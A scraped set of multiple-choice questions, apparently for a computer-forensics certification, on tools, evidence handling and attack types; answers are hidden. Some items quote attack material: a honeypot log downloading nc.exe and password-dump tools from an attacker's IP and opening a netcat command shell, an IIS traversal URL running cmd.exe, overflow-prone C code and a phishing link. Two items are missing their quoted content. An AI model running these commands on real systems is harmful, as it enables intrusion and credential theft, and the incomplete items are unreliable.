Harry has collected a suspicious executable file from an infected system and seeks to reverse its machine code to Instructions written in assembly language. Which tool should he use for this purpose?

A.

Ollydbg

B.

oledump

C.

HashCalc

D.

BinText

Full Access
Question # 120

To understand the impact of a malicious program after the booting process and to collect recent information from the disk partition, an Investigator should evaluate the content of the:

A.

MBR

B.

GRUB

C.

UEFI

D.

BIOS

Full Access
Question # 121

A forensic examiner encounters a computer with a failed OS installation and the master boot record (MBR) or partition sector damaged. Which of the following tools can find and restore files and Information In the disk?

A.

Helix

B.

R-Studio

C.

NetCat

D.

Wireshark

Full Access
Question # 122

An investigator needs to perform data acquisition from a storage media without altering its contents to maintain the Integrity of the content. The approach adopted by the Investigator relies upon the capacity of enabling read-only access to the storage media. Which tool should the Investigator Integrate Into his/her procedures to accomplish this task?

A.

BitLocker

B.

Data duplication tool

C.

Backup tool

D.

Write blocker

Full Access
Question # 123

Which layer in the loT architecture is comprised of hardware parts such as sensors, RFID tags, and devices that play an important role in data collection?

A.

Middleware layer

B.

Edge technology layer

C.

Application layer

D.

Access gateway layer

Full Access
Question # 124

Robert needs to copy an OS disk snapshot of a compromised VM to a storage account in different region for further investigation. Which of the following should he use in this scenario?

A.

Azure CLI

B.

Azure Monitor

C.

Azure Active Directory

D.

Azure Portal

Full Access
Question # 125

During a forensic investigation, a large number of files were collected. The investigator needs to evaluate ownership and accountability of those files. Therefore, he begins to Identify attributes such as "author name," "organization name." "network name," or any additional supporting data that is meant for the owner's Identification purpose. Which term describes these attributes?

A.

Data header

B.

Data index

C.

Metabase

D.

Metadata

Full Access
Question # 126

A breach resulted from a malware attack that evaded detection and compromised the machine memory without installing any software or accessing the hard drive. What technique did the adversaries use to deliver the attack?

A.

Fileless

B.

Trojan

C.

JavaScript

D.

Spyware

Full Access
Question # 127

Which OWASP loT vulnerability talks about security flaws such as lack of firmware validation, lack of secure delivery, and lack of anti-rollback mechanisms on loT devices?

A.

Lack of secure update mechanism

B.

Use of insecure or outdated components

C.

Insecure default settings

D.

Insecure data transfer and storage

Full Access
Question # 128

According to RFC 3227, which of the following is considered as the most volatile item on a typical system?

A.

Registers and cache

B.

Temporary system files

C.

Archival media

D.

Kernel statistics and memory

Full Access
Question # 129

You are the incident response manager at a regional bank. While performing routine auditing of web application logs, you find several attempted login submissions that contain the following strings:

312-49v10 question answer

What kind of attack has occurred?

A.

SQL injection

B.

Buffer overflow

C.

Cross-size scripting

D.

Cross-size request forgery

Full Access
Question # 130

Adam Is thinking of establishing a hospital In the US and approaches John, a software developer to build a site and host it for him on one of the servers, which would be used to store patient health records. He has learned from his legal advisors that he needs to have the server's log data reviewed and managed according to certain standards and regulations. Which of the following regulations are the legal advisors referring to?

A.

Data Protection Act of 2018

B.

Payment Card Industry Data Security Standard (PCI DSS)

C.

Electronic Communications Privacy Act

D.

Health Insurance Portability and Accountability Act of 1996 (HIPAA)

Full Access
Question # 131

Place the following In order of volatility from most volatile to the least volatile.

A.

Registers and cache, routing tables, temporary file systems, disk storage, archival media

B.

Register and cache, temporary file systems, routing tables, disk storage, archival media

C.

Registers and cache, routing tables, temporary file systems, archival media, disk storage

D.

Archival media, temporary file systems, disk storage, archival media, register and cache

Full Access
Question # 132

Rule 1002 of Federal Rules of Evidence (US) talks about_____

A.

Admissibility of original

B.

Admissibility of duplicates

C.

Requirement of original

D.

Admissibility of other evidence of contents

Full Access
Question # 133

Which of the following files store the MySQL database data permanently, including the data that had been deleted, helping the forensic investigator in examining the case and finding the culprit?

A.

mysql-bin

B.

mysql-log

C.

iblog

D.

ibdata1

Full Access
Question # 134

NTFS sets a flag for the file once you encrypt it and creates an EFS attribute where it stores Data Decryption Field (DDF) and Data Recovery Field (DDR). Which of the following is not a part of DDF?

A.

Encrypted FEK

B.

Checksum

C.

EFS Certificate Hash

D.

Container Name

Full Access
Question # 135

Lynne receives the following email:

Dear lynne@gmail.com! We are sorry to inform you that your ID has been temporarily frozen due to incorrect or missing information saved at 2016/11/10 20:40:24

You have 24 hours to fix this problem or risk to be closed permanently!

To proceed Please Connect >> My Apple ID

Thank You The link to My Apple ID shows http://byggarbetsplatsen.se/backup/signon/

What type of attack is this?

A.

Mail Bombing

B.

Phishing

C.

Email Spamming

D.

Email Spoofing

Full Access
Question # 136

Which of the following techniques delete the files permanently?

A.

Steganography

B.

Artifact Wiping

C.

Data Hiding

D.

Trail obfuscation

Full Access
Question # 137

Which of the following is a device monitoring tool?

A.

Capsa

B.

Driver Detective

C.

Regshot

D.

RAM Capturer

Full Access
Question # 138

Which of the following tool can reverse machine code to assembly language?

A.

PEiD

B.

RAM Capturer

C.

IDA Pro

D.

Deep Log Analyzer

Full Access
Question # 139

You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing?

A.

Polymorphic

B.

Metamorphic

C.

Oligomorhic

D.

Transmorphic

Full Access
Question # 140

You are conducting an investigation of fraudulent claims in an insurance company that involves complex text searches through large numbers of documents. Which of the following tools would allow you to quickly and efficiently search for a string within a file on the bitmap image of the target computer?

A.

Stringsearch

B.

grep

C.

dir

D.

vim

Full Access
Question # 141

You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended-up in court. What argument could the defense make to weaken your case?

A.

The tool hasn't been tested by the International Standards Organization (ISO)

B.

Only the local law enforcement should use the tool

C.

The total has not been reviewed and accepted by your peers

D.

You are not certified for using the tool

Full Access
Question # 142

Before you are called to testify as an expert, what must an attorney do first?

A.

engage in damage control

B.

prove that the tools you used to conduct your examination are perfect

C.

read your curriculum vitae to the jury

D.

qualify you as an expert witness

Full Access
Question # 143

Software firewalls work at which layer of the OSI model?

A.

Application

B.

Network

C.

Transport

D.

Data Link

Full Access
Question # 144

When conducting computer forensic analysis, you must guard against ______________ So that you remain focused on the primary job and insure that the level of work does not increase beyond what was originally expected.

A.

Hard Drive Failure

B.

Scope Creep

C.

Unauthorized expenses

D.

Overzealous marketing

Full Access
Question # 145

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

A.

Linux/Unix computers are easier to compromise

B.

Linux/Unix computers are constantly talking

C.

Windows computers are constantly talking

D.

Windows computers will not respond to idle scans

Full Access
Question # 146

You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive foot printing against their Web servers. What tool should you use?

A.

Ping sweep

B.

Nmap

C.

Netcraft

D.

Dig

Full Access
Question # 147

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years.

You navigate to archive. org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: What have you found?

A.

Web bug

B.

CGI code

C.

Trojan.downloader

D.

Blind bug

Full Access
Question # 148

You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owned by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the traffic and extract usernames and passwords. What tool could you use to get this information?

A.

Airsnort

B.

Snort

C.

Ettercap

D.

RaidSniff

Full Access
Question # 149

You should make at least how many bit-stream copies of a suspect drive?

A.

1

B.

2

C.

3

D.

4

Full Access
Question # 150

When obtaining a warrant, it is important to:

A.

particularlydescribe the place to be searched and particularly describe the items to be seized

B.

generallydescribe the place to be searched and particularly describe the items to be seized

C.

generallydescribe the place to be searched and generally describe the items to be seized

D.

particularlydescribe the place to be searched and generally describe the items to be seized

Full Access
Question # 151

Kyle is performing the final testing of an application he developed for the accounting department.

His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point?

#include #include int main(int argc, char

*argv[]) { char buffer[10]; if (argc < 2) { fprintf (stderr, "USAGE: %s string\n", argv[0]); return 1; }

strcpy(buffer, argv[1]); return 0; }

A.

Buffer overflow

B.

SQL injection

C.

Format string bug

D.

Kernal injection

Full Access
Question # 152

What will the following URL produce in an unpatched IIS Web Server?

http://www.thetargetsite.com/scripts/..% co%af../..%co%af../windows/system32/cmd.exe?/c+dir+c:\

A.

Directory listing of C: drive on the web server

B.

Insert a Trojan horse into the C: drive of the web server

C.

Execute a buffer flow in the C: drive of the web server

D.

Directory listing of the C:\windows\system32 folder on the web server

Full Access
Question # 153

You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data.

What method would be most efficient for you to acquire digital evidence from this network?

A.

create a compressed copy of the file with DoubleSpace

B.

create a sparse data copy of a folder or file

C.

make a bit-stream disk-to-image file

D.

make a bit-stream disk-to-disk file

Full Access
Question # 154

The offset in a hexadecimal code is:

A.

The last byte after the colon

B.

The 0x at the beginning of the code

C.

The 0x at the end of the code

D.

The first byte after the colon

Full Access
Question # 155

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?

A.

Tracert

B.

Smurf scan

C.

Ping trace

D.

ICMP ping sweep

Full Access
Question # 156

What will the following command accomplish?

A.

Test ability of a router to handle over-sized packets

B.

Test the ability of a router to handle under-sized packets

C.

Test the ability of a WLAN to handle fragmented packets

D.

Test the ability of a router to handle fragmented packets

Full Access
Question # 157

To preserve digital evidence, an investigator should ____________________.

A.

Make two copies of each evidence item using a single imaging tool

B.

Make a single copy of each evidence item using an approved imaging tool

C.

Make two copies of each evidence item using different imaging tools

D.

Only store the original evidence item

Full Access
Question # 158

Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response. In what state are these ports?

A.

Closed

B.

Open

C.

Stealth

D.

Filtered

Full Access
Question # 159

In General, __________________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.

A.

Network Forensics

B.

Data Recovery

C.

Disaster Recovery

D.

Computer Forensics

Full Access
Question # 160

What does the acronym POST mean as it relates to a PC?

A.

Primary Operations Short Test

B.

PowerOn Self Test

C.

Pre Operational Situation Test

D.

Primary Operating System Test

Full Access
Question # 161

Windows identifies which application to open a file with by examining which of the following?

A.

The File extension

B.

The file attributes

C.

The file Signature at the end of the file

D.

The file signature at the beginning of the file

Full Access
Question # 162

In Microsoft file structures, sectors are grouped together to form:

A.

Clusters

B.

Drives

C.

Bitstreams

D.

Partitions

Full Access
Question # 163

Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize?

A.

ATM

B.

UDP

C.

BPG

D.

OSPF

Full Access
Question # 164

You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com and find the following information for an open position: 7+ years experience in Windows Server environment 5+ years experience in Exchange 2000/2003 environment Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting software are required MCSA desired, MCSE, CEH preferred No Unix/Linux Experience needed What is this information posted on the job website considered?

A.

Social engineering exploit

B.

Competitive exploit

C.

Information vulnerability

D.

Trade secret

Full Access
Question # 165

When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP address at a specific time?

A.

on the individual computer's ARP cache

B.

in the Web Server log files

C.

in the DHCP Server log files

D.

there is no way to determine the specific IP address

Full Access
Question # 166

____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.

A.

Network Forensics

B.

Computer Forensics

C.

Incident Response

D.

Event Reaction

Full Access
Question # 167

What happens when a file is deleted by a Microsoft operating system using the FAT file system?

A.

only the reference to the file is removed from the FAT

B.

the file is erased and cannot be recovered

C.

a copy of the file is stored and the original file is erased

D.

the file is erased but can be recovered

Full Access
Question # 168

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?

A.

Passive IDS

B.

Active IDS

C.

Progressive IDS

D.

NIPS

Full Access
Question # 169

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Short reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system - johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Full Access
Question # 170

John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?

A.

Firewalk cannot pass through Cisco firewalls

B.

Firewalk sets all packets with a TTL of zero

C.

Firewalk cannot be detected by network sniffers

D.

Firewalk sets all packets with a TTL of one

Full Access
Question # 171

Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company's network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?

A.

Send DOS commands to crash the DNS servers

B.

Perform DNS poisoning

C.

Perform a zone transfer

D.

Enumerate all the users in the domain

Full Access
Question # 172

After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks.

What countermeasures could he take to prevent DDoS attacks?

A.

Enable direct broadcasts

B.

Disable direct broadcasts

C.

Disable BGP

D.

Enable BGP

Full Access
Question # 173

What is the name of the Standard Linux Command that is also available as windows application that can be used to create bit-stream images?

A.

mcopy

B.

image

C.

MD5

D.

dd

Full Access
Question # 174

What is kept in the following directory? HKLM\SECURITY\Policy\Secrets

A.

Cached password hashes for the past 20 users

B.

Service account passwords in plain text

C.

IAS account names and passwords

D.

Local store PKI Kerberos certificates

Full Access
Question # 175

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:

A.

Inculpatory evidence

B.

Mandatory evidence

C.

Exculpatory evidence

D.

Terrible evidence

Full Access
Question # 176

The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?

A.

Any data not yet flushed to the system will be lost

B.

All running processes will be lost

C.

The /tmp directory will be flushed

D.

Power interruption will corrupt the pagefile

Full Access
Question # 177

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

A.

0

B.

10

C.

100

D.

1

Full Access
Question # 178

To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software?

A.

Computer Forensics Tools and Validation Committee (CFTVC)

B.

Association of Computer Forensics Software Manufactures (ACFSM)

C.

National Institute of Standards and Technology (NIST)

D.

Society for Valid Forensics Tools and Testing (SVFTT)

Full Access
Question # 179

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?

A.

Smurf

B.

Trinoo

C.

Fraggle

D.

SYN flood

Full Access
Question # 180

What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 sever the course of its lifetime?

A.

forensic duplication of hard drive

B.

analysis of volatile data

C.

comparison of MD5 checksums

D.

review of SIDs in the Registry

Full Access
Question # 181

George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as "stealthy" as possible during the scan. Why would a scanner like Nessus is not recommended in this situation?

A.

Nessus is too loud

B.

Nessus cannot perform wireless testing

C.

Nessus is not a network scanner

D.

There are no ways of performing a "stealthy" wireless scan

Full Access
Question # 182

In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court?

A.

rules of evidence

B.

law of probability

C.

chain of custody

D.

policy of separation

Full Access
Question # 183

Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?

A.

Only an HTTPS session can be hijacked

B.

HTTP protocol does not maintain session

C.

Only FTP traffic can be hijacked

D.

Only DNS traffic can be hijacked

Full Access
Question # 184

What information do you need to recover when searching a victim’s computer for a crime committed with specific e-mail message?

A.

Internet service provider information

B.

E-mail header

C.

Username and password

D.

Firewall log

Full Access
Question # 185

When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:

A.

Recycle Bin

B.

MSDOS.sys

C.

BIOS

D.

Case files

Full Access
Question # 186

What binary coding is used most often for e-mail purposes?

A.

MIME

B.

Uuencode

C.

IMAP

D.

SMTP

Full Access
Question # 187

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

A.

The system files have been copied by a remote attacker

B.

The system administrator has created an incremental backup

C.

The system has been compromised using a t0rnrootkit

D.

Nothing in particular as these can be operational files

Full Access
Question # 188

What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled?

A.

digital attack

B.

denial of service

C.

physical attack

D.

ARP redirect

Full Access
Question # 189

You are assisting in the investigation of a possible Web Server Hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a porno graphic web site. The company checked the web server and nothing appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site?

A.

ARP Poisoning

B.

DNS Poisoning

C.

HTTP redirect attack

D.

IP Spoofing

Full Access
Question # 190

At what layer of the OSI model do routers function on?

A.

4

B.

3

C.

1

D.

5

Full Access
Question # 191

If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector investigation and should be referred to law enforcement?

A.

true

B.

false

Full Access
Question # 192

When marking evidence that has been collected with the aa/ddmmyy/nnnn/zz format, what does the nnn denote?

 

A.

The year the evidence was taken

B.

The sequence number for the parts of the same exhibit

C.

The initials of the forensics analyst

D.

The sequential number of the exhibits seized

Full Access
Question # 193

Harold is finishing up a report on a case of network intrusion, corporate spying, and embezzlement that he has been working on for over six months. He is trying to find the right term to use in his report to describe network-enabled spying. What term should Harold use?

A.

Spycrack

B.

Spynet

C.

Netspionage

D.

Hackspionage

Full Access
Question # 194

Paraben Lockdown device uses which operating system to write hard drive data?

A.

Mac OS

B.

Red Hat

C.

Unix

D.

Windows

Full Access
Question # 195

Which of the following is a list of recently used programs or opened files?

A.

Most Recently Used (MRU)

B.

Recently Used Programs (RUP)

C.

Master File Table (MFT)

D.

GUID Partition Table (GPT)

Full Access
Question # 196

You are asked to build a forensic lab and your manager has specifically informed you to use copper for lining the walls, ceilings, and floor. What is the main purpose of lining the walls, ceilings, and floor with copper?

A.

To control the room temperature

B.

To strengthen the walls, ceilings, and floor

C.

To avoid electromagnetic emanations

D.

To make the lab sound proof

Full Access
Question # 197

You need to deploy a new web-based software package for your organization. The package requires three separate servers and needs to be available on the Internet. What is the recommended architecture in terms of server placement?

A.

All three servers need to be placed internally

B.

A web server and the database server facing the Internet, an application server on the internal network

C.

A web server facing the Internet, an application server on the internal network, a database server on the internal network

D.

All three servers need to face the Internet so that they can communicate between themselves

Full Access
Question # 198

John is working as a computer forensics investigator for a consulting firm in Canada. He is called to seize a computer at a local web caf purportedly used as a botnet server. John thoroughly scans the computer and finds nothing that would lead him to think the computer was a botnet server. John decides to scan the virtual memory of the computer to possibly find something he had missed. What information will the virtual memory scan produce?

A.

It contains the times and dates of when the system was last patched

B.

It is not necessary to scan the virtual memory of a computer

C.

It contains the times and dates of all the system files

D.

Hidden running processes

Full Access
Question # 199

Using Linux to carry out a forensics investigation, what would the following command accomplish?

dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror

A.

Search for disk errors within an image file

B.

Backup a disk to an image file

C.

Copy a partition to an image file

D.

Restore a disk from an image file

Full Access
Question # 200

Which of the following files DOES NOT use Object Linking and Embedding (OLE) technology to embed and link to other objects?

A.

Portable Document Format

B.

MS-office Word Document

C.

MS-office Word OneNote

D.

MS-office Word PowerPoint

Full Access
Question # 201

What must be obtained before an investigation is carried out at a location?

A.

Search warrant

B.

Subpoena

C.

Habeas corpus

D.

Modus operandi

Full Access
Question # 202

Where are files temporarily written in Unix when printing?

A.

/usr/spool

B.

/var/print

C.

/spool

D.

/var/spool

Full Access
Question # 203

What type of flash memory card comes in either Type I or Type II and consumes only five percent of the power required by small hard drives?

A.

SD memory

B.

CF memory

C.

MMC memory

D.

SM memory

Full Access
Question # 204

Which of the following techniques can be used to beat steganography?

A.

Encryption

B.

Steganalysis

C.

Decryption

D.

Cryptanalysis

Full Access
Question # 205

The process of restarting a computer that is already turned on through the operating system is called?

A.

Warm boot

B.

Ice boot

C.

Hot Boot

D.

Cold boot

Full Access
Question # 206

Chong-lee, a forensics executive, suspects that a malware is continuously making copies of files and folders on a victim system to consume the available disk space. What type of test would confirm his claim?

A.

File fingerprinting

B.

Identifying file obfuscation

C.

Static analysis

D.

Dynamic analysis

Full Access
Question # 207

Which of the following tool is used to locate IP addresses?

A.

SmartWhois

B.

Deep Log Analyzer

C.

Towelroot

D.

XRY LOGICAL

Full Access
Question # 208

Brian needs to acquire data from RAID storage. Which of the following acquisition methods is recommended to retrieve only the data relevant to the investigation?

A.

Static Acquisition

B.

Sparse or Logical Acquisition

C.

Bit-stream disk-to-disk Acquisition

D.

Bit-by-bit Acquisition

Full Access
Question # 209

Amber, a black hat hacker, has embedded malware into a small enticing advertisement and posted it on a popular ad-network that displays across various websites. What is she doing?

A.

Malvertising

B.

Compromising a legitimate site

C.

Click-jacking

D.

Spearphishing

Full Access
Question # 210

Which of the following is a federal law enacted in the US to control the ways that financial institutions deal with the private information of individuals?

A.

SOX

B.

HIPAA 1996

C.

GLBA

D.

PCI DSS

Full Access
Question # 211

Which of the following commands shows you the username and IP address used to access the system via a remote login session and the type of client from which they are accessing the system?

A.

Net config

B.

Net sessions

C.

Net share

D.

Net stat

Full Access